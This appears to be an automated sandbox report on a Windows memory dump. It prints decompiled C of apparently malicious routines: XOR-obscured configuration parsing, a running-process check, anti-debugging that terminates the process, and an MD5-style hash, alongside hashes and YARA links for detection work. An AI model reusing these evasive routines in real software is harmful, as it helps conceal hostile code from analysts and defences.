Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction ID: 78b84ccf091ade80c70632f1aca6bf7cf547eb6f35b2cc85f70ed618fc6c39a0
Opcode Fuzzy Hash: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction Fuzzy Hash: 0CE0863744112877CB126A94DC10DEF7F6D8F51791F049020FE084D200E635E5109BF1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02EA888E, Relevance: 10.7, APIs: 7, Instructions: 237
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02EA888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x2ead2a4; // 0x63699bc3
				if(E02EA7145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x2ead2d8 = _v8;
				}
				_t31 =  *0x2ead2a4; // 0x63699bc3
				if(E02EA7145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x2ead2a4; // 0x63699bc3
				if(E02EA7145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x2ead238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x2ead2a4; // 0x63699bc3
						_t43 = E02EA6B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x2ead240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x2ead2a4; // 0x63699bc3
						_t44 = E02EA6B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x2ead244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x2ead2a4; // 0x63699bc3
						_t45 = E02EA6B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2ead248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x2ead2a4; // 0x63699bc3
						_t46 = E02EA6B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2ead004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x2ead2a4; // 0x63699bc3
						_t47 = E02EA6B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							E02EAD02C = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x2ead2a4; // 0x63699bc3
						_t48 = E02EA6B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E02EA56FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E02EA6702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x2ead2a4; // 0x63699bc3
						_t49 = E02EA6B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E02EA56FA(0, _t49) != 0) {
						_t114 =  *0x2ead32c; // 0x39c95b0
						E02EA23F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x2ead2a4; // 0x63699bc3
						_t50 = E02EA6B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x2ead2a8; // 0xb1a5a8
						_t20 = _t51 + 0x2eae252; // 0x616d692f
						 *0x2ead2d4 = _t20;
						goto L53;
					} else {
						_t61 = E02EA56FA(0, _t50);
						 *0x2ead2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x2ead2a4; // 0x63699bc3
								_t53 = E02EA6B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x2ead2a8; // 0xb1a5a8
								_t21 = _t54 + 0x2eae791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E02EA56FA(0, _t53);
							}
							 *0x2ead340 = _t55;
							HeapFree( *0x2ead238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}

0x02ea888e
0x02ea8891
0x02ea88b1
0x02ea88bf
0x02ea88bf
0x02ea88c4
0x02ea88de
0x02ea8b0d
0x02ea8b14
0x02ea8b1b
0x02ea8b1b
0x02ea88e4
0x02ea8900
0x02ea8afb
0x02ea8b05
0x00000000
0x02ea8906
0x02ea8906
0x02ea890b
0x02ea8921
0x02ea890d
0x02ea890d
0x02ea891a
0x02ea891a
0x02ea892b
0x02ea892d
0x02ea8937
0x02ea893c
0x02ea893c
0x02ea8937
0x02ea8943
0x02ea8959
0x02ea8945
0x02ea8945
0x02ea8952
0x02ea8952
0x02ea895d
0x02ea895f
0x02ea8969
0x02ea896e
0x02ea896e
0x02ea8969
0x02ea8975
0x02ea898b
0x02ea8977
0x02ea8977
0x02ea8984
0x02ea8984
0x02ea898f
0x02ea8991
0x02ea899b
0x02ea89a0
0x02ea89a0
0x02ea899b
0x02ea89a7
0x02ea89bd
0x02ea89a9
0x02ea89a9
0x02ea89b6
0x02ea89b6
0x02ea89c1
0x02ea89c3
0x02ea89cd
0x02ea89d2
0x02ea89d2
0x02ea89cd
0x02ea89d9
0x02ea89ef
0x02ea89db
0x02ea89db
0x02ea89e8
0x02ea89e8
0x02ea89f3
0x02ea89f5
0x02ea89ff
0x02ea8a04
0x02ea8a04
0x02ea89ff
0x02ea8a0b
0x02ea8a21
0x02ea8a0d
0x02ea8a0d
0x02ea8a1a
0x02ea8a1a
0x02ea8a25
0x02ea8a27
0x02ea8a2a
0x02ea8a2b
0x02ea8a32
0x02ea8a34
0x02ea8a35
0x02ea8a35
0x02ea8a32
0x02ea8a3c
0x02ea8a52
0x02ea8a3e
0x02ea8a3e
0x02ea8a4b
0x02ea8a4b
0x02ea8a56
0x02ea8a64
0x02ea8a6e
0x02ea8a6e
0x02ea8a75
0x02ea8a8b
0x02ea8a77
0x02ea8a77
0x02ea8a84
0x02ea8a84
0x02ea8a8f
0x02ea8aa2
0x02ea8aa2
0x02ea8aa7
0x02ea8aad
0x00000000
0x02ea8a91
0x02ea8a94
0x02ea8a99
0x02ea8aa0
0x02ea8ab2
0x02ea8ab4
0x02ea8aca
0x02ea8ab6
0x02ea8ab6
0x02ea8ac3
0x02ea8ac3
0x02ea8ace
0x02ea8ada
0x02ea8adf
0x02ea8adf
0x02ea8ad0
0x02ea8ad3
0x02ea8ad3
0x02ea8aed
0x02ea8af2
0x02ea8af8
0x00000000
0x02ea8af8
0x00000000
0x02ea8aa0
0x02ea8a8f

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008), ref: 02EA8933
StrToIntExA.SHLWAPI(00000000,00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008), ref: 02EA8965
StrToIntExA.SHLWAPI(00000000,00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008), ref: 02EA8997
StrToIntExA.SHLWAPI(00000000,00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008), ref: 02EA89C9
StrToIntExA.SHLWAPI(00000000,00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008), ref: 02EA89FB
HeapFree.KERNEL32(00000000,02EA5D25,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008,?,02EA5D25), ref: 02EA8AF2
HeapFree.KERNEL32(00000000,?,02EA5D25,?,63699BC3,?,02EA5D25,63699BC3,?,02EA5D25,63699BC3,00000005,02EAD00C,00000008,?,02EA5D25), ref: 02EA8B05

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 41b9563fa708800d6349662e9f64fa0b3bdde153f45dfff606ee7a1f20badec9
Instruction ID: ed2054be6de7152f390f42ff797b1483d61c12f1288b6aa2d5d7cf38b16134d2
Opcode Fuzzy Hash: 41b9563fa708800d6349662e9f64fa0b3bdde153f45dfff606ee7a1f20badec9
Instruction Fuzzy Hash: 90717571EC0105AFCB50EBB9DDA899B77EEEB48304768AD11A40ADF514E730F995CB20

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4FB4, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1DBEF3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1DBF08
UnhandledExceptionFilter.KERNEL32(6E1FDEAC), ref: 6E1DBF13
GetCurrentProcess.KERNEL32(C0000409), ref: 6E1DBF2F
TerminateProcess.KERNEL32(00000000), ref: 6E1DBF36

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction ID: e239c2e4e972f70165b1d4545fc472ad3b7e12bca548073ce95aba2cb4bf68fa
Opcode Fuzzy Hash: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction Fuzzy Hash: 5821F4B5415B04DFDF51DF7AC48C6983BB6BB0A325F10A01BE48987350E7B159A5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 02EAA65C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02EAA65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2ead2a8; // 0xb1a5a8
						_t2 = _t9 + 0x2eaee34; // 0x73617661
						_push( &_v264);
						if( *0x2ead0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02eaa667
0x02eaa671
0x02eaa675
0x02eaa67f
0x02eaa6b0
0x02eaa686
0x02eaa68b
0x02eaa698
0x02eaa6a1
0x02eaa6b8
0x02eaa6a3
0x02eaa6ab
0x00000000
0x02eaa6ab
0x02eaa6b9
0x02eaa6ba
0x00000000
0x02eaa6ba
0x00000000
0x02eaa6b4
0x02eaa6c0
0x02eaa6c5

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02EAA66C
Process32First.KERNEL32(00000000,?), ref: 02EAA67F
Process32Next.KERNEL32(00000000,?), ref: 02EAA6AB
CloseHandle.KERNEL32(00000000), ref: 02EAA6BA

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: fb44a59a44ae19cb382e875548365c3e4ced5a0e17886feb4acef70271803c99
Instruction ID: 3381abca1678be0d2825449107d23220bac14a2f39121a7a82601fc6a794aceb
Opcode Fuzzy Hash: fb44a59a44ae19cb382e875548365c3e4ced5a0e17886feb4acef70271803c99
Instruction Fuzzy Hash: FEF0F6325C12246AC720BA6A9C49EEB77BDDBC5314F019171F509CA300EB60FA95CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1F0E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1F0E() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e1a4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e1a413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e1a412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e1a4128 = _t5;
						 *0x6e1a4130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e1a4124 = _t6;
						if(_t6 == 0) {
							 *0x6e1a4124 =  *0x6e1a4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e1a1f0f
0x6e1a1f1d
0x6e1a1f23
0x6e1a1f2a
0x6e1a1f81
0x6e1a1f81
0x6e1a1f2c
0x6e1a1f34
0x6e1a1f41
0x6e1a1f41
0x6e1a1f7d
0x6e1a1f7f
0x00000000
0x00000000
0x00000000
0x6e1a1f36
0x6e1a1f3d
0x6e1a1f43
0x6e1a1f43
0x6e1a1f48
0x6e1a1f56
0x6e1a1f5b
0x6e1a1f61
0x6e1a1f67
0x6e1a1f6e
0x6e1a1f70
0x6e1a1f70
0x6e1a1f7a
0x6e1a1f3f
0x6e1a1f3f
0x00000000
0x6e1a1f3f
0x6e1a1f3d

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1A1462,74B063F0), ref: 6E1A1F1D
GetVersion.KERNEL32 ref: 6E1A1F2C
GetCurrentProcessId.KERNEL32 ref: 6E1A1F48
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1A1F61

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 717e53205c201c453b13f934533bfc88d16599818d1de27d24465dd60fa1eb4c
Instruction ID: b0d9f476f66e7a96c8e582f6288b118d0a31900adf68407cad29e1295be849c1
Opcode Fuzzy Hash: 717e53205c201c453b13f934533bfc88d16599818d1de27d24465dd60fa1eb4c
Instruction Fuzzy Hash: 10F044B5794F119BDF515BAC69197BC3BA0E717752F208125F641C61C4DB70A087BB08

Uniqueness

Uniqueness Score: -1.00%

Function 02EA3EE1, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E02EA3EE1(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x02ea3ee4
0x02ea3eef
0x02ea3ef2
0x02ea3ef5
0x02ea3ef6
0x02ea3f14
0x02ea3f16
0x02ea3f19
0x02ea3f1c
0x02ea3f1c
0x02ea3f1f
0x02ea3f1f
0x02ea3f22
0x02ea3f22
0x02ea3f25
0x02ea3f25
0x02ea3f42
0x02ea3f45
